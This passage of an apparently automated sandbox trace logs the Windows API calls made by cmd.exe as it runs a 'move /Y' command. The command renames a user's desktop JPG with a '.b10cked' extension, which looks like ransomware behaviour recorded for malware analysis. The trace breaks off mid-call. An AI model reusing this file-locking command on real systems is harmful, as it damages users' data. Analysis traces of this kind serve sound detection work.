"private_0x00000000000f0000" filename = "" Region: id = 16187 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 16188 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 16189 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 232 os_tid = 0xe74 [0141.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff2c | out: lpSystemTimeAsFileTime=0x30ff2c*(dwLowDateTime=0x8e8572a0, dwHighDateTime=0x1d440a9)) [0141.913] GetCurrentProcessId () returned 0xeb8 [0141.913] GetCurrentThreadId () returned 0xe74 [0141.913] GetTickCount () returned 0x2c744 [0141.913] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff24 | out: lpPerformanceCount=0x30ff24*=19870198898) returned 1 [0141.914] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.914] __set_app_type (_Type=0x1) [0141.914] __p__fmode () returned 0x76b331f4 [0141.914] __p__commode () returned 0x76b331fc [0141.914] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.914] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.914] GetCurrentThreadId () returned 0xe74 [0141.914] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe74) returned 0x38 [0141.914] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.914] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.914] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30febc | out: phkResult=0x30febc*=0x0) returned 0x2 [0141.915] VirtualQuery (in: lpAddress=0x30fef3, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.915] GetConsoleOutputCP () returned 0x1b5 [0141.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.915] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.915] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.916] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.916] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.916] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.916] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.916] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.917] GetEnvironmentStringsW () returned 0x110180* [0141.917] FreeEnvironmentStringsW (penv=0x110180) returned 1 [0141.917] GetEnvironmentStringsW () returned 0x110180* [0141.917] FreeEnvironmentStringsW (penv=0x110180) returned 1 [0141.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee2c | out: phkResult=0x30ee2c*=0x40) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0xa8, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x0, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegCloseKey (hKey=0x40) returned 0x0 [0141.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee2c | out: phkResult=0x30ee2c*=0x40) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x0, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegCloseKey (hKey=0x40) returned 0x0 [0141.918] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.918] srand (_Seed=0x5b886370) [0141.918] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" [0141.918] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" [0141.918] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.919] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1118e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.919] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.919] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.919] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.919] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.919] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.919] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.919] GetEnvironmentStringsW () returned 0x1122d0* [0141.920] FreeEnvironmentStringsW (penv=0x1122d0) returned 1 [0141.920] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.920] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.920] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.920] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.920] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.920] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.920] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fbf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.920] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fbf8, lpFilePart=0x30fbf4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fbf4*="Desktop") returned 0x18 [0141.920] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.920] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f974 | out: lpFindFileData=0x30f974) returned 0x110010 [0141.920] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f974 | out: lpFindFileData=0x30f974) returned 0x110010 [0141.921] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f974 | out: lpFindFileData=0x30f974) returned 0x110010 [0141.921] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.921] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.921] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.921] GetEnvironmentStringsW () returned 0x112af0* [0141.921] FreeEnvironmentStringsW (penv=0x112af0) returned 1 [0141.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.922] GetConsoleOutputCP () returned 0x1b5 [0141.922] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.922] GetUserDefaultLCID () returned 0x409 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd38, cchData=128 | out: lpLCData="0") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd38, cchData=128 | out: lpLCData="0") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd38, cchData=128 | out: lpLCData="1") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.923] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.924] GetConsoleTitleW (in: lpConsoleTitle=0x1008e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.926] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.926] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.926] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.926] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.926] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.926] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.926] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.929] GetConsoleTitleW (in: lpConsoleTitle=0x30fa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.318] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.318] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.318] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.318] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.318] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.318] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.318] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.318] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.318] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.318] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.319] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.319] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0142.319] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0142.319] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.319] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.319] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.319] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.319] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.319] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f7ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f7e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f7e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.321] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0142.321] _wcsicmp (_String1="BKWVSD~1.JPG", _String2=".") returned 52 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2="..") returned 52 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsd~1.jpg")) returned 0x20 [0142.322] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x111e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", nBufferLength=0x104, lpBuffer=0x30f174, lpFilePart=0x30f15c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", lpFilePart=0x30f15c*="BKWVSD~1.JPG") returned 0x25 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2=".") returned 52 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2="..") returned 52 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsd~1.jpg")) returned 0x20 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", nBufferLength=0x104, lpBuffer=0x30f5f0, lpFilePart=0x30f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", lpFilePart=0x30f388*="BKWVSD~1.JPG") returned 0x25 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f7f8, lpFilePart=0x30f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", lpFilePart=0x30f388*="bkwVSdvUcmd7uNf_5 x.jpg.b10cked") returned 0x38 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.323] SetLastError (dwErrCode=0x0) [0142.323] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg.b10cked")) returned 0xffffffff [0142.323] GetLastError () returned 0x2 [0142.323] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30ed04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ed04) returned 0x100e58 [0142.323] FindNextFileW (in: hFindFile=0x100e58, lpFindFileData=0x30ed04 | out: lpFindFileData=0x30ed04) returned 0 [0142.323] GetLastError () returned 0x12 [0142.323] FindClose (in: hFindFile=0x100e58 | out: hFindFile=0x100e58) returned 1 [0142.324] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x111bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x111bd8) returned 0x100e58 [0142.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30ef9c, lpFilePart=0x0 | out: 